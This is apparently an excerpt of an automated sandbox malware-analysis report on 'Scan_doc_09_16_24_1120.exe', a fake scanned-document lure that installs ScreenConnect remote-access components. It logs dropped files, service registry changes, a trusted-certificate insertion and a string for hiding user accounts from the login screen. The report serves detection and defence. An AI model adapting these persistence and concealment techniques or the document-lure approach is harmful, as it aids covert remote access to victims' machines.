                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dll
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: certificate valid
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2784738148.00000227082D0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F4C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284476507.0000000001852000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Scan_doc_09_16_24_1120.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2784738148.00000227082CC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708353000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F47000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2282591404.00000000024C2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.3273020779.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.2941168266.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.2940865152.0000000003100000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.2277621533.0000000000BCD000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2784738148.0000022707F43000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082C8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2286646662.000000001C312000.00000002.00000001.01000000.00000012.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2784738148.0000022707F43000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082C8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2286646662.000000001C312000.00000002.00000001.01000000.00000012.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2784738148.00000227082D0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F4C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284476507.0000000001852000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F3B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270802E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2283012190.0000000004B32000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.drStatic PE information: 0xB80EE04C [Tue Nov 8 12:57:48 2067 UTC]
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_00831000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00831000
                  Source: Scan_doc_09_16_24_1120.exeStatic PE information: real checksum: 0x1bda6 should be: 0x1b34e
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeCode function: 0_2_00831BC0 push ecx; ret 0_2_00831BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848DFD2A5 pushad ; iretd 1_2_00007FF848DFD2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F28E01 push 8B495C8Ch; iretd 1_2_00007FF848F28E0C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F17D00 push eax; retf 1_2_00007FF848F17D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F28D31 push 8B495C8Ch; iretd 1_2_00007FF848F28D3C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F100BD pushad ; iretd 1_2_00007FF848F100C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F1842E pushad ; ret 1_2_00007FF848F1845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F39450 push ds; retn 5F4Ch1_2_00007FF848F3946F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F1845E push eax; ret 1_2_00007FF848F1846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848F14162 push eax; ret 10_2_00007FF848F14163
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848F12D68 push eax; ret 10_2_00007FF848F12E7B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848F1401A push eax; iretd 10_2_00007FF848F1401B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848F130BA push eax; iretd 10_2_00007FF848F130BB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848F13F3A pushad ; retf 10_2_00007FF848F13F3B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848F12FDA pushad ; retf 10_2_00007FF848F12FDB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeCode function: 11_2_024818B1 push 4C025033h; retf 11_2_024818BD
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849255918 pushad ; retn 4924h13_2_00007FF849255991
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849257E9A push ds; retf 13_2_00007FF849257E9B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849257EA3 push ds; retf 13_2_00007FF849257EA4
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849257D84 push ss; iretd 13_2_00007FF849257D85
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 15_2_00007FF848F6E298 pushad ; retf 4920h15_2_00007FF848F6E3A9
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 15_2_00007FF8492435AA push 00000030h; iretd 15_2_00007FF8492435AC
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 15_2_00007FF849242F03 pushfd ; iretd 15_2_00007FF849242F8D

                  Persistence and Installation Behavior

                  barindex
                  Creates files in the system32 config directory
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (73549b67-726b-470e-ab1a-fbbb83a6a15b)

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Contains functionality to hide user accounts
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2286646662.000000001C312000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.2282591404.00000000024C2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.3273020779.00000000023F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000F.00000002.2941168266.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000F.00000002.2940865152.0000000003100000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
